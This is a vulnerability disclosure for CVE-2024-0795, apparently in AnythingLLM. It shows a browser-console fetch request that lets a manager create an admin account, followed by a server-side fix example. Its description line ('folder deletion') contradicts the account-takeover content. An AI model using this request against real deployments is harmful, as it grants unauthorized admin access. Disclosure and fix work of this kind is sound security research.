
CVE-2024-0795 - Improper access control / admin account takeover

Description of the CVE-2024-0795

Improper input validation leads to arbitrary folder deletion (recursively)

🔒️ Requirements

  • Multi-user mode activated
  • Be a manager

👀 Observation

We can see in the UI that the manager account cannot create / add / modify admin accounts; however, this protection is not present on the server side.

💥 Proof of Concept

Here are the current users:

I will use raltheo2 account.

  1. I open Chrome dev tools
  2. Inside the console I put:

```javascript
fetch('/api/admin/users/new', {
  method: 'POST',
  headers: {
    'Authorization': `Bearer ${localStorage.getItem('anythingllm_authToken')}`,
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({ username: 'supadmin9', password: 'password', role: 'admin' })
})
```


This creates an administrator account named supadmin9 with the password password.


Now log in to your new admin account :)


🛠️ Fix suggestion

The separation between the admin and manager roles should be enforced on the server side, exactly as the frontend already does: the role of the authenticated caller, not the role field in the request body, must decide whether an admin account may be created or modified.
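An added example of what that server-side check can look like (this is illustrative code written for this post, not AnythingLLM's own handler; the Express-style `(req, res)` handler shape, the `req.user` session object and the in-memory `users` store are assumptions):

```javascript
// Server-side role separation for a user-creation endpoint.
// Hypothetical code: mirrors the UI rule that only admins may create admin
// accounts, so a manager replaying the API call directly is refused.
const ROLES = ["default", "manager", "admin"];
const users = []; // assumed in-memory store standing in for the database

// Returns null when the request is allowed, otherwise a reason string.
// The decision is based on the authenticated requester, never on the body.
function userCreationError(requester, newUser) {
  if (!requester || !ROLES.includes(requester.role)) return "unauthenticated";
  if (!newUser || !ROLES.includes(newUser.role)) return "invalid role";
  if (requester.role === "default") return "insufficient privileges";
  // The missing check: a manager must not create or elevate an admin.
  if (newUser.role === "admin" && requester.role !== "admin") {
    return "managers cannot create admin accounts";
  }
  return null;
}

// Express-style handler; req.user is the session resolved from the token.
function createUserHandler(req, res) {
  const err = userCreationError(req.user, req.body);
  if (err) return res.status(403).json({ success: false, error: err });
  const user = { username: req.body.username, role: req.body.role };
  users.push(user);
  return res.status(200).json({ success: true, user });
}

// Minimal fake response object so the handler can be exercised offline.
function fakeRes() {
  const res = { statusCode: 200, body: null };
  res.status = (c) => { res.statusCode = c; return res; };
  res.json = (b) => { res.body = b; return res; };
  return res;
}

// Replays the reported request as a manager: with the check in place it
// is rejected and no admin account is stored.
function replayAsManager() {
  const res = fakeRes();
  createUserHandler(
    { user: { username: "raltheo2", role: "manager" },
      body: { username: "supadmin9", password: "password", role: "admin" } },
    res,
  );
  return res; // statusCode 403, body.success false
}
```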

🖊️ References

You can find the report here and the CVE details here.
